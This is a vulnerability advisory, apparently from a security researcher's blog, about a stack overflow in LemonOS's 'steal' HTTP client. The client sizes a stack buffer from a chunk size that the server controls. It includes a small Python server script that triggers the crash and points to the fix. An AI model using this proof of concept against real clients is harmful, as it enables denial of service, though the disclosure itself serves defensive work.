Lemon OS | Remote stack overflow
Information
| Software Type | Operating System |
|---|---|
| Software Name | LemonOS |
| Affected Version | nightly-2024-07-12 |
| Software Vendor | LemonOS |
| Software Link | https://github.com/LemonOSProject/LemonOS |
| Severity | High |
| CVSS Score | 7.5 |
| CVE Link | CVE-2025-9001 |
| Affected Assets | 10+ |
| Date of Discovery | April 10th 2025 |
| PoC Exploit | https://github.com/LemonOSProject/LemonOS/issues/60 |
Description
This vulnerability was identified as a result of collaborative efforts between myself and 0xVpr, I identified the vulnerability and 0xVpr mitigated against it by providing a fix.
This report details a stack overflow vulnerability in the steal HTTP client (curl equivalent for LemonOS), identified during an analysis conducted on April 10, 2025. The vulnerability arises from the use of a variable-length array (VLA) in the HTTPGet function, specifically at line 361 of main.cpp, where char recieveBuffer[chunkSize]; is declared.
The chunkSize value is controlled by an external HTTP server response, allowing an attacker to trigger a crash or potentially escalate the impact with precise manipulation.
Reproduce
Download and put the following two files in the same directory:
- https://github.com/LemonOSProject/LemonOS/blob/master/Applications/Steal/main.cpp
- https://github.com/LemonOSProject/LemonOS/blob/master/LibLemon/include/Lemon/Core/URL.h
Compile the code:
g++ -g -o steal main.cpp -lssl -lcrypto
Create a python server that responds with a 10MB data size to any incoming requests:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 80))
s.listen(1)
print("Listening on 127.0.0.1:80")
conn, addr = s.accept()
conn.recv(1024)
response = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
chunk_size = 10485760 # 10MB
payload = b"A" * chunk_size
response += f"{hex(chunk_size)[2:]}".encode() + b"\r\n"
response += payload + b"\r\n"
response += b"0\r\n\r\n"
conn.send(response)
conn.close()
s.close()Ensure Python-3 is installed and then run this:
$ python3 server.pyThink of this as a normal server that makes a 10MB installer available to users when they request it.
Compile the steal binary:
g++ -g -o steal main.cpp -lssl -lcryptoRun it by sending a request to the server with steal binary:
./steal "127.0.0.1"This will trigger a segmentation fault and crashes the program.
For a more extensive & detailed proof of concept, see the issue I opened on Github:
https://github.com/LemonOSProject/LemonOS/issues/60
Mitigation
0xVpr has modified main.cpp and fixed the bug:
https://gist.github.com/0xHamy/f54f672ddf49e41e550350448e4c93a9
You can now run the same attack again and serve a chunk_size of 100MB or 10x the amount we used for our initial tests and you will notice that steal doesn't crash no more.
Proof of Concept (PoC) Video
Posted on: May 23, 2025 01:10 AM